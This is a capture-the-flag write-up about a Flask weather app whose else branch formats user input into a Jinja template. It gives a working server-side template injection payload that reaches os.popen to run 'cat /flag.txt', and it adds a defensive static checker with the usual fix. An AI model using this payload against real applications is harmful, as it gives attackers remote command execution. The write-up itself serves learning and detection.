cyberpunk-weather-app
SRC: https://library.m0unt41n.ch/challenges/cyberpunk-weather-app
This challenge displays weather data and uses a templating engine. While building a string, an injection vulnerability was created in the else block: the f-string places the district value into the template source before it is rendered, so we can inject Python code and thereby obtain RCE.
Python:
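if district in districts:
    data = weather.get_weather(district)
    message = render_template_string(f"Current weather in {district} (on {data['time']}): {data['temperature']}°C, {data['conditions']}")
else:
    # Vulnerable: district is formatted into the template source itself,
    # so any {{ ... }} it contains is evaluated by the templating engine.
    message = render_template_string(f"District {district} not found.")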
Finding this is only part of the challenge: we also need a way to go beyond executing Python code and obtain access to something like os. So escaping the Jinja sandbox (the templating engine) is crucial. We do this similarly to JS prototype chaining: we start at the request object and reach the import of os through application -> globals -> builtins. ChatGPT helped a lot here.
{{ request.application.__globals__.__builtins__.__import__('os').popen('cat /flag.txt').read() }}
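For reviewing code for the pattern in the else block above, a small static check that flags render_template_string calls whose template is built at runtime. This is an added example, not code from the challenge; SAMPLE, is_dynamic and find_dynamic_templates are names made up here, and the "fixed" function shows the usual remedy of passing the value as template context.

```python
import ast

SINK = "render_template_string"

# Constructed sample: the pattern from the page's else block next to a form
# that passes the value as template context instead of building the template.
SAMPLE = '''
from flask import render_template_string

def vulnerable(district):
    return render_template_string(f"District {district} not found.")

def fixed(district):
    return render_template_string("District {{ district }} not found.", district=district)
'''


def is_dynamic(node):
    """True if the template argument is assembled at runtime."""
    if isinstance(node, ast.Constant) and isinstance(node.value, str):
        return False  # plain literal: template text is fixed
    if isinstance(node, ast.JoinedStr):
        # f-string: dynamic only when it contains a {placeholder}
        return any(isinstance(v, ast.FormattedValue) for v in node.values)
    # Concatenation, %-formatting, .format() and bare variables all land
    # here; flag them conservatively for manual review.
    return True


def find_dynamic_templates(source):
    """Return sorted line numbers of SINK calls with a runtime-built template."""
    hits = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call):
            continue
        func = node.func
        name = func.id if isinstance(func, ast.Name) else getattr(func, "attr", None)
        if name != SINK:
            continue
        # Flask's signature is render_template_string(source, **context)
        template = node.args[0] if node.args else next(
            (kw.value for kw in node.keywords if kw.arg == "source"), None)
        if template is not None and is_dynamic(template):
            hits.append(node.lineno)
    return sorted(hits)


if __name__ == "__main__":
    for line in find_dynamic_templates(SAMPLE):
        print(f"line {line}: template passed to {SINK} is built at runtime")
```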